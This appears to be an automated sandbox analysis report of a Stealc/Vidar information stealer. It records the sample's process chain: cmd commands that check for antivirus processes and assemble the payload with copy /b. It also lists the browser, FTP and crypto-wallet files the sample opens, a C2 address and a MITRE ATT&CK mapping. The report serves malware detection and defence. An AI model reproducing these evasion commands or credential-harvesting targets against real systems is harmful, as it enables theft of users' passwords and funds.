                    Source: FCGIJKJJ.11.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
                    Source: FCGIJKJJ.11.drBinary or memory string: global block list test formVMware20,11696487552
                    Source: FCGIJKJJ.11.drBinary or memory string: tasks.office.comVMware20,11696487552o
                    Source: FCGIJKJJ.11.drBinary or memory string: AMC password management pageVMware20,11696487552
                    Source: FCGIJKJJ.11.drBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
                    Source: FCGIJKJJ.11.drBinary or memory string: interactivebrokers.comVMware20,11696487552
                    Source: FCGIJKJJ.11.drBinary or memory string: dev.azure.comVMware20,11696487552j
                    Source: FCGIJKJJ.11.drBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
                    Source: FCGIJKJJ.11.drBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
                    Source: Pct.pif, 0000000B.00000002.3806737898.0000000001B3F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                    Source: FCGIJKJJ.11.drBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
                    Source: FCGIJKJJ.11.drBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
                    Source: FCGIJKJJ.11.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
                    Source: FCGIJKJJ.11.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
                    Source: FCGIJKJJ.11.drBinary or memory string: outlook.office365.comVMware20,11696487552t
                    Source: FCGIJKJJ.11.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
                    Source: Pct.pif, 0000000B.00000002.3806641933.0000000001ACF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                    Source: FCGIJKJJ.11.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
                    Source: FCGIJKJJ.11.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
                    Source: FCGIJKJJ.11.drBinary or memory string: outlook.office.comVMware20,11696487552s
                    Source: FCGIJKJJ.11.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
                    Source: FCGIJKJJ.11.drBinary or memory string: turbotax.intuit.comVMware20,11696487552t
                    Source: FCGIJKJJ.11.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
                    Source: Pct.pif, 0000000B.00000002.3806641933.0000000001A6A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@
                    Source: FCGIJKJJ.11.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
                    Source: FCGIJKJJ.11.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifAPI call chain: ExitProcess graph end nodegraph_11-114450
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifCode function: 11_2_00C345D5 BlockInput,11_2_00C345D5
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifCode function: 11_2_00BD5240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,11_2_00BD5240
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifCode function: 11_2_00BF5CAC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,11_2_00BF5CAC
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_004062FC
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifCode function: 11_2_00C188CD GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,11_2_00C188CD
                    Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifCode function: 11_2_00BEA385 SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_00BEA385
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifCode function: 11_2_00BEA354 SetUnhandledExceptionFilter,11_2_00BEA354
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifMemory protected: page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Yara detected Powershell download and execute
                    Source: Yara matchFile source: Process Memory Space: Pct.pif PID: 6312, type: MEMORYSTR
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifCode function: 11_2_00C19369 LogonUserW,11_2_00C19369
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifCode function: 11_2_00BD5240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,11_2_00BD5240
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifCode function: 11_2_00C21AC6 SendInput,keybd_event,11_2_00C21AC6
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifCode function: 11_2_00C251E2 mouse_event,11_2_00C251E2
                    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Tag Tag.bat & Tag.batJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc" Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth" Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 627982Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "VoipBiographiesScholarPorno" Dis Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Omissions + ..\Involve + ..\Retro + ..\Official + ..\Network + ..\Unlike + ..\Relates KJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Pct.pif KJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\ProgramData\KFCFBFHIEB.exe"Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\ProgramData\KFCFBFHIEB.exe "C:\ProgramData\KFCFBFHIEB.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifCode function: 11_2_00C188CD GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,11_2_00C188CD
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifCode function: 11_2_00C24F1C AllocateAndInitializeSid,CheckTokenMembership,FreeSid,11_2_00C24F1C
                    Source: file.exe, 00000000.00000003.2198637480.00000000028EE000.00000004.00000020.00020000.00000000.sdmp, Pct.pif, 0000000B.00000000.2246871769.0000000000C76000.00000002.00000001.01000000.00000006.sdmp, Cake.0.dr, Pct.pif.2.drBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                    Source: Pct.pifBinary or memory string: Shell_TrayWnd
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifCode function: 11_2_00BE885B cpuid 11_2_00BE885B
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifCode function: 11_2_00C00030 GetLocalTime,__swprintf,11_2_00C00030
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifCode function: 11_2_00C00722 GetUserNameW,11_2_00C00722
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifCode function: 11_2_00BF416A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,11_2_00BF416A
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00406805 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00406805

                    Stealing of Sensitive Information

                    barindex
                    Yara detected Clipboard Hijacker
                    Source: Yara matchFile source: 25.2.oobeldr.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 22.2.KFCFBFHIEB.exe.400000.0.unpack, type: UNPACKEDPE
                    Yara detected Stealc
                    Source: Yara matchFile source: 11.3.Pct.pif.1b79858.8.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.Pct.pif.1e0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.Pct.pif.1a82888.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.Pct.pif.1a82888.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000B.00000002.3807123175.0000000001BE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000003.3594009510.0000000001EB7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000003.3593733373.0000000001C2C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000003.3594534889.0000000001B2D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.3806737898.0000000001AE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000003.3594226622.0000000001B2D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000003.3594226622.0000000001B79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000003.3593810174.0000000001B70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.3806641933.0000000001A6A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000003.3594181599.0000000001AE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.3804413256.00000000001E1000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000003.3593856204.0000000001B70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000003.3593733373.0000000001BE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Pct.pif PID: 6312, type: MEMORYSTR
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Yara detected Vidar stealer
                    Source: Yara matchFile source: Process Memory Space: Pct.pif PID: 6312, type: MEMORYSTR
                    Found many strings related to Crypto-Wallets (likely being stolen)
                    Source: Pct.pif, 0000000B.00000002.3804413256.000000000023A000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: Electrum
                    Source: Pct.pif, 0000000B.00000002.3804413256.0000000000265000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: \ElectronCash\wallets\
                    Source: Pct.pif, 0000000B.00000002.3804413256.000000000023A000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: \Electrum\wallets\
                    Source: Pct.pif, 0000000B.00000002.3804413256.000000000026F000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: \jaxx\Local Storage\
                    Source: Pct.pif, 0000000B.00000002.3804413256.000000000023A000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: window-state.json
                    Source: Pct.pif, 0000000B.00000002.3804413256.000000000023A000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: exodus.conf.json
                    Source: Pct.pif, 0000000B.00000002.3804413256.000000000023A000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: \Exodus\
                    Source: Pct.pif, 0000000B.00000002.3804413256.000000000023A000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: info.seco
                    Source: Pct.pif, 0000000B.00000002.3804413256.000000000023A000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: ElectrumLTC
                    Source: Pct.pif, 0000000B.00000002.3804413256.000000000026F000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: \jaxx\Local Storage\
                    Source: Pct.pif, 0000000B.00000002.3804413256.000000000023A000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: passphrase.json
                    Source: Pct.pif, 0000000B.00000002.3804413256.000000000023A000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: \Ethereum\
                    Source: Pct.pif, 0000000B.00000002.3804413256.000000000023A000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: Exodus
                    Source: Pct.pif, 0000000B.00000002.3804413256.0000000000272000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: file__0.localstorage
                    Source: Pct.pif, 0000000B.00000002.3804413256.000000000023A000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: Ethereum
                    Source: Pct.pif, 0000000B.00000002.3806641933.0000000001A6A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: sst.mys\user\AppData\Roaming\\Coinomi\Coinomi\wallets\\*.*.
                    Source: Pct.pif, 0000000B.00000002.3804413256.000000000023A000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: \Exodus\exodus.wallet\
                    Source: Pct.pif, 0000000B.00000002.3806641933.0000000001A6A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: my.sst45.145.4.234/ce4b71a59f4ee761.phpoge\\multidoge.wallet/
                    Source: Pct.pif, 0000000B.00000002.3804413256.000000000023A000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: seed.seco
                    Source: Pct.pif, 0000000B.00000002.3804413256.000000000023A000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: keystore
                    Source: Pct.pif, 0000000B.00000002.3804413256.000000000023A000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: \Electrum-LTC\wallets\
                    Tries to harvest and steal browser information (history, passwords, etc)
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite-walJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.jsJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-shmJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqliteJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-walJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqliteJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journalJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite-shmJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                    Tries to harvest and steal ftp login credentials
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
                    Tries to steal Crypto Currency Wallets
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\Jump to behavior
                    Source: Pct.pifBinary or memory string: WIN_81
                    Source: Pct.pifBinary or memory string: WIN_XP
                    Source: Pct.pifBinary or memory string: WIN_XPe
                    Source: Pct.pifBinary or memory string: WIN_VISTA
                    Source: Pct.pifBinary or memory string: WIN_7
                    Source: Pct.pifBinary or memory string: WIN_8
                    Source: Pct.pif.2.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 3USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte
                    Source: Yara matchFile source: Process Memory Space: Pct.pif PID: 6312, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Yara detected Stealc
                    Source: Yara matchFile source: 11.3.Pct.pif.1b79858.8.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.Pct.pif.1e0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.Pct.pif.1a82888.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.Pct.pif.1a82888.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000B.00000002.3807123175.0000000001BE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000003.3594009510.0000000001EB7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000003.3593733373.0000000001C2C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000003.3594534889.0000000001B2D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.3806737898.0000000001AE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000003.3594226622.0000000001B2D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000003.3594226622.0000000001B79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000003.3593810174.0000000001B70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.3806641933.0000000001A6A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000003.3594181599.0000000001AE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.3804413256.00000000001E1000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000003.3593856204.0000000001B70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000003.3593733373.0000000001BE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Pct.pif PID: 6312, type: MEMORYSTR
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Yara detected Vidar stealer
                    Source: Yara matchFile source: Process Memory Space: Pct.pif PID: 6312, type: MEMORYSTR

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity Information1
                    Scripting                    		2
                    Valid Accounts                    		1
                    Windows Management Instrumentation                    		1
                    Scripting                    		1
                    Exploitation for Privilege Escalation                    		11
                    Disable or Modify Tools                    		2
                    OS Credential Dumping                    		2
                    System Time Discovery                    		Remote Services1
                    Archive Collected Data                    		12
                    Ingress Tool Transfer                    		Exfiltration Over Other Network Medium1
                    System Shutdown/Reboot
                    CredentialsDomainsDefault Accounts1
                    Native API                    		1
                    DLL Side-Loading                    		1
                    DLL Side-Loading                    		1
                    Deobfuscate/Decode Files or Information                    		21
                    Input Capture                    		1
                    Account Discovery                    		Remote Desktop Protocol4
                    Data from Local System                    		21
                    Encrypted Channel                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain Accounts1
                    Scheduled Task/Job                    		2
                    Valid Accounts                    		2
                    Valid Accounts                    		2
                    Obfuscated Files or Information                    		Security Account Manager3
                    File and Directory Discovery                    		SMB/Windows Admin Shares21
                    Input Capture                    		3
                    Non-Application Layer Protocol                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCron1
                    Scheduled Task/Job                    		21
                    Access Token Manipulation                    		1
                    Software Packing                    		NTDS126
                    System Information Discovery                    		Distributed Component Object Model3
                    Clipboard Data                    		114
                    Application Layer Protocol                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script12
                    Process Injection                    		1
                    DLL Side-Loading                    		LSA Secrets231
                    Security Software Discovery                    		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts1
                    Scheduled Task/Job                    		111
                    Masquerading                    		Cached Domain Credentials1
                    Virtualization/Sandbox Evasion                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
                    Valid Accounts                    		DCSync4
                    Process Discovery                    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                    Virtualization/Sandbox Evasion                    		Proc Filesystem11
                    Application Window Discovery                    		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt21
                    Access Token Manipulation                    		/etc/passwd and /etc/shadow1
                    System Owner/User Discovery                    		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                    IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron12
                    Process Injection                    		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1527287 Sample: file.exe Startdate: 06/10/2024 Architecture: WINDOWS Score: 100 60 sst.my 2->60 62 hFXSqazHOXBOkJfWqLCELfcAYW.hFXSqazHOXBOkJfWqLCELfcAYW 2->62 64 18.31.95.13.in-addr.arpa 2->64 72 Suricata IDS alerts for network traffic 2->72 74 Found malware configuration 2->74 76 Malicious sample detected (through community Yara rule) 2->76 78 9 other signatures 2->78 12 file.exe 23 2->12         started        14 oobeldr.exe 2->14         started        signatures3 process4 signatures5 17 cmd.exe 2 12->17         started        96 Antivirus detection for dropped file 14->96 98 Multi AV Scanner detection for dropped file 14->98 100 Detected unpacking (changes PE section rights) 14->100 102 Switches to a custom stack to bypass stack traces 14->102 21 schtasks.exe 1 14->21         started        process6 file7 48 C:\Users\user\AppData\Local\Temp\...\Pct.pif, PE32 17->48 dropped 70 Drops PE files with a suspicious file extension 17->70 23 Pct.pif 37 17->23         started        28 cmd.exe 2 17->28         started        30 conhost.exe 17->30         started        34 7 other processes 17->34 32 conhost.exe 21->32         started        signatures8 process9 dnsIp10 66 sst.my 103.6.198.219, 443, 63886 EXABYTES-AS-APExaBytesNetworkSdnBhdMY Malaysia 23->66 68 45.145.4.234, 63885, 63887, 80 ALEXHOSTMD Russian Federation 23->68 52 C:\Users\user\AppData\...\softokn3[1].dll, PE32 23->52 dropped 54 C:\Users\user\AppData\Local\...\nss3[1].dll, PE32 23->54 dropped 56 C:\Users\user\AppData\...\mozglue[1].dll, PE32 23->56 dropped 58 11 other files (7 malicious) 23->58 dropped 88 Found many strings related to Crypto-Wallets (likely being stolen) 23->88 90 Tries to harvest and steal ftp login credentials 23->90 92 Tries to harvest and steal browser information (history, passwords, etc) 23->92 94 Tries to steal Crypto Currency Wallets 23->94 36 cmd.exe 1 23->36         started        file11 signatures12 process13 process14 38 KFCFBFHIEB.exe 1 36->38         started        42 conhost.exe 36->42         started        file15 50 C:\Users\user\AppData\Roaming\...\oobeldr.exe, MS-DOS 38->50 dropped 80 Antivirus detection for dropped file 38->80 82 Multi AV Scanner detection for dropped file 38->82 84 Detected unpacking (changes PE section rights) 38->84 86 2 other signatures 38->86 44 schtasks.exe 1 38->44         started        signatures16 process17 process18 46 conhost.exe 44->46         started       

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    file.exe8%ReversingLabs

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\l3[1].exe100%AviraHEUR/AGEN.1304053
                    C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe100%AviraHEUR/AGEN.1304053
                    C:\ProgramData\KFCFBFHIEB.exe100%AviraHEUR/AGEN.1304053
                    C:\ProgramData\KFCFBFHIEB.exe74%ReversingLabsWin32.Ransomware.RedLine
                    C:\ProgramData\freebl3.dll0%ReversingLabs
                    C:\ProgramData\mozglue.dll0%ReversingLabs
                    C:\ProgramData\msvcp140.dll0%ReversingLabs
                    C:\ProgramData\nss3.dll0%ReversingLabs
                    C:\ProgramData\softokn3.dll0%ReversingLabs
                    C:\ProgramData\vcruntime140.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\freebl3[1].dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\l3[1].exe74%ReversingLabsWin32.Ransomware.RedLine
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\mozglue[1].dll0%ReversingLabs
